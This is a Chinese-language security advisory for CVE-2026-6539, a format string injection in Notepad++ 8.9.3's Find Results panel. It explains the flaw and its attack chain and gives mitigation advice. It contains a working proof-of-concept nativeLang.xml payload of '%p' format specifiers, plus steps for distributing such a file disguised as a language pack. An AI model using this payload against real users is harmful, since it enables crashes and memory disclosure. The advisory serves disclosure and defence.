CVE-2026-6539 CVSS 4.4 中危

CVE-2026-6539 Notepad++格式字符串注入漏洞

披露日期: 2026-04-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6539

漏洞类型

格式字符串注入

CVSS评分

4.4 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Notepad++

漏洞概述

Notepad++ 8.9.3版本存在格式字符串注入漏洞，位于“查找结果”面板处理程序中。攻击者通过制作恶意nativeLang.xml语言包文件，诱导用户加载并执行搜索操作，触发格式字符串解释，导致拒绝服务及堆栈或寄存器内容泄露。

技术细节

该漏洞源于Notepad++在处理“查找结果”面板输出时，未能正确过滤用户可控的输入，直接将其作为格式化参数传递给底层C库函数（如snprintf或wsprintf）。攻击者可构造包含格式说明符（如%x, %s, %n）的恶意nativeLang.xml文件。当用户加载该语言包并触发搜索功能时，程序会解析XML并将恶意字符串传入存在漏洞的函数。由于格式说明符会被解析器特殊处理，攻击者可读取栈上数据造成信息泄露，或写入任意内存导致程序崩溃（拒绝服务）。攻击向量要求本地访问和用户交互，通常通过分发篡改的语言包实现。

攻击链分析

STEP 1

1. 制作恶意文件

攻击者构造包含格式字符串payload（如%p%p%p）的恶意nativeLang.xml语言包文件。

STEP 2

2. 社会工程学分发

通过社区论坛或第三方下载站分发伪装成正常语言包的恶意文件。

STEP 3

3. 用户安装与交互

受害者下载并导入该语言包到Notepad++，并在软件中执行搜索操作。

STEP 4

4. 触发漏洞

搜索结果面板尝试解析并显示语言包中的文本，触发格式字符串解析，导致程序崩溃或泄露内存数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
PoC for CVE-2026-6539: Notepad++ Format String Injection
Save this as nativeLang.xml and import it into Notepad++.
Perform a search operation to trigger the crash/information leak.
-->
<NotepadPlus>
    <Native-Langue>
        <!-- The following element triggers the format string vulnerability in Find Results panel -->
        <FindResult>
            <Title>AAAA%p-%p-%p-%p-%p-%p-%p-%p</Title>
        </FindResult>
    </Native-Langue>
</NotepadPlus>

影响范围

Notepad++ <= 8.9.3

防御指南

临时缓解措施

在官方修复补丁发布前，建议用户不要安装来源不明的第三方语言包，仅使用软件默认或官方验证的语言包，并限制对不可信文件的访问。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表